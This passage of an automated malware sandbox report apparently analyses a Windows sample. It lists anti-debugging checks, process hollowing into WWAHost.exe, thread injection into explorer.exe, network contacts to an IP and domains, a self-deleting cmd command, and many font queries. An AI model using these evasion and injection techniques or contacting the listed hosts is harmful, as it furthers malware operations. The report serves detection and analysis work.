            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C22073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C31074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C34015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C34015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B80050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B80050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0040ACE0 LdrLoadDll,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
            Source: C:\Windows\explorer.exeDomain query: www.sherwoodmastiff.com
            Source: C:\Windows\explorer.exeDomain query: www.kingtreemusic.com
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 9B0000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeMemory written: C:\Users\user\Desktop\EH5ro3Hyug.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeThread register set: target process: 3424
            Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3424
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
            Source: explorer.exe, 00000007.00000000.725053158.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000007.00000000.710602516.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000C.00000002.936222094.00000000051D0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000007.00000000.710602516.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000C.00000002.936222094.00000000051D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.710602516.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000C.00000002.936222094.00000000051D0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.710602516.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000C.00000002.936222094.00000000051D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.717543897.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Users\user\Desktop\EH5ro3Hyug.exe VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
